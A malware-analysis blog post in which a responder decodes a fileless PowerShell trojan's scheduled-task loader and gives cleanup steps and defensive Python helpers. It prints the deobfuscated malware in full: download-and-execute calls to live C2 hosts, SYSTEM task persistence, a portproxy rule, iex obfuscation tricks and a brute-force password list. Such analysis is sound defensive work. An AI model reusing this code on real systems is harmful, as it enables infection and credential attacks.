Analysis of a Driver Life (驱动人生) trojan sample

Published: March 10, 2019 // Categories: ops work, linux, windows

During an incident response today I ran into the Driver Life (驱动人生) trojan and analysed one of its PowerShell scripts, which turned out to be quite interesting. This backdoor extends the original: besides the usual internal port scanning, SMB weak-password brute forcing and pass-the-hash, it adds an MS17-010 vulnerability scan.

To borrow a senior researcher's phrasing: the trojan's samples are all fileless, and its core technique is running PowerShell code from scheduled tasks to keep persistent control, so the PowerShell code is analysed first to understand what it does and then to decide how to detect and remove it.

The first thing I found was this entry in the scheduled tasks:

```
powershell" -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=
```

Decoding it (the -e payload is base64 over UTF-16LE, so every character is followed by a NUL byte that the terminal does not display):

```shell
echo SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA= | base64 -D
```

```
IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)
```

It mainly reads the current machine/domain name ($env:USERDOMAIN) to build the URL http://v.beahh.com/v{name}. Any name can be substituted to fetch the next stage.
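The decoding step above, generalised a little as an added example (not code from the original post): a Python helper that pulls every -e/-enc/-EncodedCommand argument out of a scheduled-task or process command line, decodes the UTF-16LE base64 and lists the URLs the stage reaches for. SAMPLE_TASK_COMMAND is the task command line quoted above; ENC_FLAG, URL_RE and the function names are this example's own.

```python
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the
# spellings usually seen in task command lines. "-ep bypass" is not matched
# because the text after -e must be followed by whitespace.
ENC_FLAG = re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+")

# The scheduled-task command line found on the infected host (from the post).
SAMPLE_TASK_COMMAND = (
    'powershell" -ep bypass -e '
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"
    "LgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgA"
    "aAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA="
)


def decode_encoded_command(blob):
    """-EncodedCommand payloads are base64 over UTF-16LE text (what `base64 -D`
    printed above, minus the NUL bytes)."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le").rstrip("\x00")


def encode_command(script):
    """Inverse of the above; useful for building test cases."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage_command_line(cmdline):
    """Decode every encoded-command argument in a command line and collect the
    URLs the decoded stage reaches out to."""
    decoded = []
    for m in ENC_FLAG.finditer(cmdline):
        try:
            decoded.append(decode_encoded_command(m.group(1)))
        except (ValueError, UnicodeDecodeError):
            continue  # the argument only looked like base64; not an encoded command
    joined = "\n".join(decoded)
    return {
        "decoded": decoded,
        "urls": sorted(set(URL_RE.findall(cmdline + "\n" + joined))),
        "invokes_iex": bool(re.search(r"\biex\b|invoke-expression", joined, re.I)),
    }
```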

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('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')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

This unreadable blob has to be decoded. In PowerShell, Invoke-Expression runs any string as PowerShell code, which makes it a convenient primitive for dynamic execution. Simply change Invoke-Expression to Write-Host (much like the all-purpose echo in PHP).

The decoded output turned out to be obfuscated yet again.

Focus on the tail end:

```powershell
Gqw+Gqw{)1- tg- )','
4FX4FX = valfs]gnirGqw+Gqwts[Gqw((b3P) ; [aRray]::reverse( ( VARiABlE (Gqw7XP8Gqw+Gqw0','GqwuCteG::]ytitnedIswodniW.lapicni')).RePlacE(([CHaR]97+[CHaR]99+[CHaR]68),'|').RePlacE(([CHaR]98+[CHaR]51+[CHaR]80),[strING][CHaR]34).RePlacE('0VP',[strING][CHaR]36).RePlacE(([CHaR]71+[CHaR]113+[CHaR]119),[strING][CHaR]39)|&((get-varIAblE '*MDR*').NAme[3,11,2]-joIn'')
```

Running the final expression once in PowerShell:

```powershell
PS >((get-varIAblE '*MDR*').NAme[3,11,2]-joIn'')
iex
```

Since it is iex, this is easy: print the result with Write-Host again.

```powershell
4FX4FX = valfs]gnirGqw+Gqwts[Gqw((b3P) ; [aRray]::reverse( ( VARiABlE (Gqw7XP8Gqw+Gqw0','GqwuCteG::]ytitnedIswodniW.lapicni')).RePlacE(([CHaR]97+[CHaR]99+[CHaR]68),'|').RePlacE(([CHaR]98+[CHaR]51+[CHaR]80),[strING][CHaR]34).RePlacE('0VP',[strING][CHaR]36).RePlacE(([CHaR]71+[CHaR]113+[CHaR]119),[strING][CHaR]39)|& Write-Host
```


After staring at the output for a while, the fragment ( $eNV:cOmSpec[4,24,25]-JoIN'') stood out: the env reference is suspicious and is clearly pulling characters out of a system environment variable. I ran it in PowerShell to see what it evaluates to.

Sure enough, iex again. Since it is iex, print with Write-Host once more.

```powershell
4FX4FX = valfs]gnir'+'ts['((") ; [aRray]::reverse( ( VARiABlE ('7XP8'+'0') -VA )) ;
Write-Host ( " $( $ofS ='') " + [stRiNG](( VARiABlE ('7XP8'+'0') -VA ) )+" $( SEt-ITEM 'VariABLE:OFs'  ' ' ) " )
```

After running this, recognisable pieces appear, such as creating a scheduled task and downloading something.

It is still obfuscated, though, and needs one more round of decoding.

```powershell
') -CREplace  'sfl',[CHAR]36 -CREplace '8ex',[CHAR]124 -REPlaCE  'XF4',[CHAR]34-CREplace  'rpK',[CHAR]39 -CREplace([CHAR]104+[CHAR]56+[CHAR]65),[CHAR]92) | .( $ShelLiD[1]+$sHELlid[13]+'X')
```

The key part is .( $ShelLiD[1]+$sHELlid[13]+'X'), which looks very much like iex. Swap it and see.

As expected, iex again. Print with Write-Host once more.

```powershell
') -CREplace  'sfl',[CHAR]36 -CREplace '8ex',[CHAR]124 -REPlaCE  'XF4',[CHAR]34-CREplace  'rpK',[CHAR]39 -CREplace([CHAR]104+[CHAR]56+[CHAR]65),[CHAR]92) | Write-Host
```

Running that produced the unobfuscated source:

```powershell
[string]$av = ""
[string]$avs = ""
[string]$log1 = ""
[string]$log2 = ""
# Fingerprint the host: MAC address, registered AV products, and whether
# 360's active-defence service (zhudongfangyu) is running
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
    for($v = 0; $v -lt $avs.Count; $v++){
        $av += $avs[$v] + "|"
    }
}else{
    $av = $avs
}
try{
    if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
        $av += 'ZDFY'
    }
}catch{}
#[System.Threading.Thread]::Sleep((Get-Random -Minimum 10000 -Maximum 100000))
# ppppp.log marks a host that has already been processed
$path = "$env:temp\\ppppp.log"
[string]$flag = test-path $path
try{
    $log1 = (Get-EventLog -LogName 'Security' -After (get-date).AddDays(-7) -befor (get-date).AddDays(-3)).length
    $log2 = (Get-EventLog -LogName 'Security' -After (get-date).AddDays(-2)).length
}catch{}
# Beacon query string appended to every request to the C2
$key = "&mac="+$mac+"&av="+$av+"&ver="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&log1=" + $log1 + "&log2=" + $log2
if($flag -eq 'False'){
    try{
        # Drop the next stage as cred.ps1 (expected size 2997721 bytes) and
        # persist it with a scheduled task, running as SYSTEM when elevated
        $file = "$env:appdata\\Microsoft\\cred.ps1"
        $size = (Get-ChildItem $file -recurse | Measure-Object -property length -sum).sum
        if($size -ne 2997721){
            $url = 'http://27.102.107.137/new.dat?pebb' + $key
            (New-Object System.Net.WebClient).DownloadFile($url,"$file")
            $size2 = (Get-ChildItem $file -recurse | Measure-Object -property length -sum).sum
            if($size2 -eq 2997721){
                $status = 'add_ok'
                if (([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){
                &cmd.exe /c schtasks /create /ru system /sc MINUTE /mo 60 /st 07:00:00 /tn Credentials /tr "powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1" /F
                }else{
                &cmd.exe /c schtasks /create /sc MINUTE /mo 60 /st 07:00:00 /tn Credentials /tr "powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1" /F
                }
            }else{$status = 'error'}
        }else{
            $status = 'old1'
        }
        New-Item $path -type file
    }catch{}
}else{
    $status = 'old2'
}
# Report the result to the C2 and execute whatever status.json returns
try{
    $download = 'http://27.102.107.137/status.json?pebb' + $key  + "&" + $status  + "&" + $MyInvocation.MyCommand.Definition
    IEX (New-Object Net.WebClient).DownloadString("$download")
}catch{}
try{
    &cmd.exe /c schtasks /delete /tn "\Microsoft\Credentials" /f
}catch{}
[System.Threading.Thread]::Sleep(3000)
Stop-Process -Force -processname powershell
```

Its main job is to collect basic information such as the MAC address, check whether anti-virus products such as 360's active-defence service are present, then download http://27.102.107.137/new.dat to appdata\Microsoft\cred.ps1 and add the scheduled tasks Credentials and \Microsoft\Credentials.

Next, http://27.102.107.137/status.json was analysed and restored the same way.

```powershell
[string]$av = ""
[string]$avs = ""
# Same host fingerprint as cred.ps1; ddd.tmp marks a host already processed
[string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1| ConvertFrom-Csv -Header MAC|select-object -expand MAC)
$avs = (Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct).displayName
if($avs.GetType().name.IndexOf('Object') -gt -1){
    for($v = 0; $v -lt $avs.Count; $v++){
        $av += $avs[$v] + "|"
    }
}else{
    $av = $avs
}
try{
    if((Get-Service zhudongfangyu | Sort -Property Status).Status -eq "Running"){
        $av += 'ZDFY'
    }
}catch{}
$path1 = "$env:temp\\ddd.tmp"
[string]$ddd = test-path $path1
$status = 'problem'
$key = "&mac="+$mac+"&av="+$av+"&ver="+(Get-WmiObject -Class Win32_OperatingSystem).version+"&bit="+(Get-WmiObject Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" + (Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME + "&kill=" + $tkill + "&status="
# Only when elevated and 360 active defence is absent: drop a random-named exe
# (expected size 1634984 bytes) into %SystemRoot% and persist it as SYSTEM
if($av.IndexOf("ZDFY") -ne -1){
    $status = 'ZDFY'
}elseif(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") -and ($ddd -eq 'False')){
    try{
        New-Item $path1 -type file
        $url = 'http://27.102.107.137/ddd.png?p=ddd' + $key
        $pname = -join ([char[]](97..122) | Get-Random -Count (Get-Random -Minimum 4 -Maximum 8))
        $pnamepath = $pname + '.exe'
        $pnamepath = "$env:SystemRoot\" + $pnamepath
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $pnamepath)
        $status = 'error'
        $dsize = (Get-ChildItem $pnamepath -Force -recurse | Measure-Object -property length -sum).sum
        if($dsize -eq '1634984'){
            &cmd.exe /c schtasks /create /ru SYSTEM /sc MINUTE /mo 30 /st 07:00:00 /tn "\Microsoft\Windows\Location\$pname" /tr "$pnamepath" /F
            $status = 'addok'
        }
    }catch{}
}elseif($ddd -ne 'False'){
    $status = 'old'
}else{
    $status = 'Low'
}
New-Item $path1 -type file
# Report back, run whatever ddd.json returns, and remove the older task name
try{
    $download = 'http://27.102.107.137/ddd.json?p=ddd' + $key + $status
    IEX (New-Object Net.WebClient).DownloadString("$download")
    &cmd.exe /c schtasks /delete /tn "\Microsoft\Credentials" /f
}catch{}
```

http://27.102.107.137/new.dat was restored the same way.

One of its base64 blobs contains the script that adds the scheduled task and the port-forwarding rule:

```
cmd.exe /c netsh.exe firewall add portopening tcp 65533 DNS&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AZQBiAD8AMwAyACcAKQA=

cmd.exe /c netsh.exe firewall add portopening tcp 65533 DNS&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr "powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AZQBiAD8ANgA0ACcAKQA=" /F
```


It then pays particular attention to the 10.x, 172.x and 192.168.x ranges; otherwise it queries https://api.ipify.org/ for the public IP and scans from there. The built-in weak-password list:

```powershell
$WmicUSER = @("administrator")
$allpass = @("123456","password","PASSWORD","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678","123456789","987654321","admin","abc123","abcd1234","abcd@1234","abc@123","p@ssword","P@ssword","p@ssw0rd","P@ssw0rd","P@SSWORD","P@SSW0RD","P@$$w0rd","P@$$word","P@$$w0rd","iloveyou","monkey","login","passw0rd","master","hello","qazwsx","password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator")
```

It also has a built-in MS17-010 scan.

The main takeaway for me was the different ways of writing iex:

```powershell
PS C:\Users\Administrator\Desktop> ((get-varIAblE '*MDR*').NAme[3,11,2]-joIn'')
iex
PS C:\Users\Administrator\Desktop> ( $eNV:cOmSpec[4,24,25]-JoIN'')
iex
PS C:\Users\Administrator\Desktop> ( $ShelLiD[1]+$sHELlid[13]+'X')
ieX
PS C:\Users\Administrator\Desktop> $pname = -join ([char[]](97..122) | Get-Random -Count (Get-Random -Minimum 4 -Maximum 8))
PS C:\Users\Administrator\Desktop> $pname
wvhni
PS C:\Users\Administrator\Desktop> ((vaRIABlE '*MDR*').NAme[3,11,2]-JoIn'')
iex
PS C:\Users\Administrator\Desktop> .( $pSHoME[4]+$pshOME[34]+'X')

cmdlet Invoke-Expression at command pipeline position 1
Supply values for the following parameters:
Command: .( $pSHoME[4]+$pshOME[34]+'X')
PS C:\Users\Administrator\Desktop> ( $pSHoME[4]+$pshOME[34]+'X')
ieX
```
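Every alias above indexes into a well-known string ($env:ComSpec, $ShellId, $PSHOME, or the one variable whose name matches '*MDR*'). The following added example (not from the post) resolves those index and [CHAR] tricks statically, without executing any of the script, so the Write-Host swap can be done with confidence; KNOWN_VARS holds assumed default values for an English 64-bit Windows host.

```python
import re

# Values the samples index into; assumed defaults, adjust for the host under
# analysis. '*MDR*' resolves as PowerShell would: MaximumDriveCount is the only
# automatic variable matching that wildcard.
KNOWN_VARS = {
    "env:comspec": r"C:\Windows\system32\cmd.exe",
    "shellid": "Microsoft.PowerShell",
    "pshome": r"C:\Windows\System32\WindowsPowerShell\v1.0",
    "mdr": "MaximumDriveCount",
}
VAR_INDEX = re.compile(r"\$(env:\w+|\w+)\[([\d,]+)\]", re.I)                  # $ShelLiD[1]
GETVAR_INDEX = re.compile(r"\(\s*(?:get-)?variable\s+'\*(\w+)\*'\s*\)\.name\[([\d,]+)\]", re.I)
CHAR_SUM = re.compile(r"(?:\[char\]\d+\+?)+", re.I)                            # [CHaR]97+[CHaR]99
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")                             # 'i'+'e'
JOIN_NOOP = re.compile(r"'([^']*)'\s*-join\s*''", re.I)                        # 'iex'-joIn''


def _pick(value, indexes):
    return "".join(value[int(i)] for i in indexes.split(","))


def _quote(text):
    return "'" + text.replace("'", "''") + "'"


def _resolve_var(m):
    key = m.group(1).lower()
    return _quote(_pick(KNOWN_VARS[key], m.group(2))) if key in KNOWN_VARS else m.group(0)


def deobfuscate(script):
    """Rewrite index / char-code / concatenation tricks into the literals they evaluate to."""
    out = VAR_INDEX.sub(_resolve_var, script)
    out = GETVAR_INDEX.sub(_resolve_var, out)
    out = CHAR_SUM.sub(lambda m: _quote("".join(chr(int(c)) for c in re.findall(r"\d+", m.group(0)))), out)
    out = JOIN_NOOP.sub(r"'\1'", out)
    prev = None
    while prev != out:  # fold 'a'+'b'+'c' until nothing changes
        prev, out = out, CONCAT.sub(lambda m: _quote(m.group(1) + m.group(2)), out)
    return out


def iex_literals(script):
    """Count revealed Invoke-Expression aliases, i.e. the spots to swap for Write-Host."""
    return len(re.findall(r"'(?:iex|invoke-expression)'", script, re.I))
```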

That more or less covers the related scheduled tasks; clean them up:

```
schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn  "\Microsoft\windows\Bluetooths" /tr 

schtasks /create /sc MINUTE /mo 60 /st 07:00:00 /tn Credentials /tr "powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1"

schtasks /create /ru SYSTEM /sc MINUTE /mo 30 /st 07:00:00 /tn "\Microsoft\Windows\Location\$pname" /tr "$pnamepath" /F
```
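To hunt for the same persistence on other hosts, an added example (not from the post) that scans `schtasks /query /fo CSV /v` output for the task names and command-line traits listed above and produces the matching deletion commands for review. SAMPLE_CSV is constructed and trimmed to four of the columns schtasks emits; the task names, random-name length and size of the random exe name come from the post.

```python
import csv
import io
import re

# Task paths created by the samples analysed above (names taken from the post)
KNOWN_TASK_PATHS = {r"microsoft\windows\bluetooths", "credentials", r"microsoft\credentials"}
# \Microsoft\Windows\Location\<4-7 random lowercase letters> (Get-Random -Minimum 4 -Maximum 8)
LOCATION_TASK = re.compile(r"^microsoft\\windows\\location\\[a-z]{4,7}$")
# The dropped stage-2 binary is %SystemRoot%\<same random name>.exe
RANDOM_EXE = re.compile(r"^(?:%systemroot%|c:\\windows)\\[a-z]{4,7}\.exe$", re.I)
# Command-line traits of the loader tasks seen in this campaign
RUN_TRAITS = {
    "execution policy bypass": re.compile(r"-ep\s+bypass", re.I),
    "encoded command": re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "cred.ps1 loader": re.compile(r"cred\.ps1", re.I),
}


def _norm(task_name):
    return task_name.strip().lstrip("\\").lower()


def suspicious_tasks(csv_text):
    """Scan `schtasks /query /fo CSV /v` output; return [(task name, [reasons])]."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        name, run = row.get("TaskName", ""), row.get("Task To Run", "").strip()
        reasons = []
        if _norm(name) in KNOWN_TASK_PATHS or LOCATION_TASK.match(_norm(name)):
            reasons.append("task path matches known persistence name")
        if RANDOM_EXE.match(run):
            reasons.append("runs random-named exe from %SystemRoot%")
        reasons += [trait for trait, rx in RUN_TRAITS.items() if rx.search(run)]
        if reasons:
            findings.append((name, reasons))
    return findings


def cleanup_commands(findings):
    """Deletion commands for an operator to review before running; nothing is executed here."""
    return ['schtasks /delete /tn "%s" /f' % name for name, _ in findings]


# Constructed sample, trimmed to four of the columns schtasks emits
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Run As User"
"HOST1","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","SYSTEM"
"HOST1","\Microsoft\windows\Bluetooths","powershell -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAA=","SYSTEM"
"HOST1","\Credentials","powershell -nop -w hidden -ep bypass -f %appdata%\Microsoft\cred.ps1","HOST1\alice"
"HOST1","\Microsoft\Windows\Location\wvhni","C:\Windows\wvhni.exe","SYSTEM"
'''
```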

The following files also need to be removed:

```
\AppData\Roaming\sign.txt
\AppData\Roaming\flashplayer.tmp
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.bat
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk
%systemroot%\xxx.exe    (xxx is a random name generated by: -join ([char[]](97..122) | Get-Random -Count (Get-Random -Minimum 4 -Maximum 8)))
```

The decoded files are provided for download:
new.dat
status.json
v
